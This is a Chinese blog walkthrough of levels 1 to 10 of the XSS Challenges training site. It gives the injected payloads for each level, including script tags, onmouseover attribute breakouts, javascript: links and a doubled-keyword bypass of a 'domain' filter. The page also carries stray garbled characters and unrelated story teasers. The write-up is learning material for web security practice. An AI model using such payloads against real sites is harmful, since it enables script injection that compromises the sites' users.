XSS Challenges 通關(guān)筆記（一）

今天周末，找了個(gè)XSS游戲，直接開始，打開地址：https://xss-quiz.int21h.jp/

第一關(guān)：

有搜索框俯树，直接輸入代碼試試：11"/><script>alert(document.domain);</script>alert(document.domain);

第二關(guān)：

進(jìn)入第二關(guān)，同樣直接輸入代碼：11"/><script>alert(document.domain);</script>

果然不行贰盗，再看源代碼：

有標(biāo)簽许饿，直接閉合標(biāo)簽：1111"/><script>alert(document.domain)</script><

第三關(guān)：

進(jìn)入第三關(guān)，直接輸入任意內(nèi)容搜索看結(jié)果：

有兩個(gè)參數(shù)舵盈，抓包陋率，在第二個(gè)標(biāo)簽輸入代碼（果然沒過濾）：<script>alert(document.domain)</script>

第四關(guān)：

第四關(guān)又多了一個(gè)參數(shù)，抓包在新參數(shù)插入代碼：

沒彈框秽晚？瓦糟，看源碼：

有閉合，閉合尖括號：”/><script>alert(document.domain)</script><”

第五關(guān)：

第五關(guān)新參數(shù)又沒了：

看源代碼沒什么特別赴蝇，就是閉合標(biāo)簽菩浙，還做了輸入限制：

直接修改限制，輸入代碼（）和上關(guān)一樣：”/><script>alert(document.domain)</script><”

還是不行句伶，果然忽略了閉合劲蜻，直接在input標(biāo)簽執(zhí)行”onmouseover=”alert(document.domain)

當(dāng)然直接抓包進(jìn)行不會有限制字?jǐn)?shù)。

第六關(guān)：

進(jìn)入關(guān)發(fā)現(xiàn)和上一關(guān)差不多考余，應(yīng)該又是做了其他限制：

上代碼：”onmouseover=”alert(document.domain)

第七關(guān)：

這一關(guān)和上兩關(guān)頁面一樣：

同樣上代碼："onmouseover="alert(document.domain)

雙引號被編碼了先嬉，那就用空格：onmouseover= alert(document.domain)

第八關(guān)：

這關(guān)是在搜索框輸入內(nèi)容，點(diǎn)擊內(nèi)容轉(zhuǎn)換成鏈接秃殉，再點(diǎn)鏈接轉(zhuǎn)到鏈接地址：

看源碼坝初，鏈接再a標(biāo)簽里：

A標(biāo)簽用javascript執(zhí)行：javascript:alert(document.domain)

第九關(guān)：

這關(guān)是UTF-7編碼：

編碼以后也不行浸剩，上網(wǎng)查了下钾军，果然是需要ie環(huán)境的鳄袍，這個(gè)沒有，直接過吧吏恭，畢竟有firebug：

第十關(guān)：

看源代碼直接執(zhí)行代碼：”onmouseover=”alert(document.domain)拗小，結(jié)果，domain被過濾：

直接雙寫進(jìn)行繞過：" onmouseover="alert(document.ddomainomain)

今天就到這了·樱哼。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者

人面猴
序言：七十年代末哀九，一起剝皮案震驚了整個(gè)濱河市，隨后出現(xiàn)的幾起案子搅幅，更是在濱河造成了極大的恐慌阅束，老刑警劉巖，帶你破解...
沈念sama閱讀 222,378評論 6贊 516
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件茄唐，死亡現(xiàn)場離奇詭異息裸，居然都是意外死亡，警方通過查閱死者的電腦和手機(jī)沪编，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 94,970評論 3贊 399
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門呼盆，熙熙樓的掌柜王于貴愁眉苦臉地迎上來，“玉大人蚁廓，你說我怎么就攤上這事访圃。” “怎么了相嵌？”我有些...
開封第一講書人閱讀 168,983評論 0贊 362
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵腿时，是天一觀的道長。經(jīng)常有香客問我饭宾，道長批糟，這世上最難降的妖魔是什么？我笑而不...
開封第一講書人閱讀 59,938評論 1贊 299
?港島之戀（遺憾婚禮）
正文為了忘掉前任捏雌，我火速辦了婚禮跃赚，結(jié)果婚禮上，老公的妹妹穿的比我還像新娘性湿。我一直安慰自己纬傲，他們只是感情好，可當(dāng)我...
茶點(diǎn)故事閱讀 68,955評論 6贊 398
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布肤频。她就那樣靜靜地躺著叹括，像睡著了一般。火紅的嫁衣襯著肌膚如雪宵荒。梳的紋絲不亂的頭發(fā)上汁雷，一...
開封第一講書人閱讀 52,549評論 1贊 312
城市分裂傳說
那天净嘀，我揣著相機(jī)與錄音，去河邊找鬼侠讯。笑死挖藏，一個(gè)胖子當(dāng)著我的面吹牛，可吹牛的內(nèi)容都是我干的厢漩。我是一名探鬼主播膜眠，決...
沈念sama閱讀 41,063評論 3贊 422
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼，長吁一口氣：“原來是場噩夢啊……” “哼溜嗜！你這毒婦竟也來了宵膨？” 一聲冷哼從身側(cè)響起，我...
開封第一講書人閱讀 39,991評論 0贊 277
萬榮殺人案實(shí)錄
序言：老撾萬榮一對情侶失蹤炸宵，失蹤者是張志新（化名）和其女友劉穎辟躏，沒想到半個(gè)月后，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體土全，經(jīng)...
沈念sama閱讀 46,522評論 1贊 319
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡捎琐，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 38,604評論 3贊 342
?白月光啟示錄
正文我和宋清朗相戀三年，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了涯曲。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片野哭。...
茶點(diǎn)故事閱讀 40,742評論 1贊 353
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡，死狀恐怖幻件，靈堂內(nèi)的尸體忽然破棺而出拨黔，到底是詐尸還是另有隱情，我是刑警寧澤绰沥，帶...
沈念sama閱讀 36,413評論 5贊 351
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布篱蝇，位于F島的核電站，受9級特大地震影響徽曲，放射性物質(zhì)發(fā)生泄漏零截。R本人自食惡果不足惜，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 42,094評論 3贊 335
男人毒藥：我在死后第九天來索命
文/蒙蒙一秃臣、第九天我趴在偏房一處隱蔽的房頂上張望涧衙。院中可真熱鬧，春花似錦奥此、人聲如沸弧哎。這莊子的主人今日做“春日...
開封第一講書人閱讀 32,572評論 0贊 25
一樁弒父案稚虎，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽撤嫩。三九已至，卻和暖如春蠢终，著一層夾襖步出監(jiān)牢的瞬間序攘，已是汗流浹背茴她。一陣腳步聲響...
開封第一講書人閱讀 33,671評論 1贊 274
情欲美人皮
我被黑心中介騙來泰國打工，沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留程奠，地道東北人丈牢。一個(gè)月前我還...
沈念sama閱讀 49,159評論 3贊 378
代替公主和親
正文我出身青樓，卻偏偏與公主長得像梦染，于是被迫代替她去往敵國和親赡麦。傳聞我的和親對象是個(gè)殘疾皇子朴皆，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 45,747評論 2贊 361

XSS Challenges 通關(guān)筆記（一）

推薦閱讀更多精彩內(nèi)容